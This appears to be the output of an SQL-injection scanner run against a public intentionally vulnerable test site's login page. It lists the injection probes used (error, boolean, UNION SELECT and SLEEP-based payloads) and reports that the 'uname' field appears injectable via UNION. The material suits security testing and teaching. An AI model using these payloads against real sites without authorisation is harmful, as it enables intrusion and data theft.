    -------------------- VULNERABILITY REPORT --------------------    


+--------------------------------------------------------------------
|                                                                    |
|  Target URL: http://testphp.vulnweb.com/login.php                  |
|                                                                    |
|  Request Method: POST                                              |
|                                                                    |
|  Crawl Depth: 0                                                    |
|                                                                    |
+--------------------------------------------------------------------


======================================================================
                         VULNERABILITY CHECK                          
======================================================================

=== Check: error, with: 

       -> '


=== Check: boolean, with: 

       -> ' AND 1=1 -- 
       -> ' AND 1=2 --


=== Check: union, with: 

       -> ' UNION SELECT NULL-- 
       -> ' UNION SELECT NULL, NULL-- 
       -> ' UNION SELECT NULL, NULL, NULL--


=== Check: sleep, with: 

       -> 1' AND SLEEP(5)--


== Form tested: userinfo.php

+-------+-------+---------+-------+-------+
| Input | error | boolean | union | sleep |
+-------+-------+---------+-------+-------+
| uname |       |         |   V   |       |
|  pass |       |         |       |       |
+-------+-------+---------+-------+-------+


== Form tested: search.php?test=query

+-----------+-------+---------+-------+-------+
|   Input   | error | boolean | union | sleep |
+-----------+-------+---------+-------+-------+
| searchFor |       |         |       |       |
+-----------+-------+---------+-------+-------+


    ---------------------------- END ----------------------------     
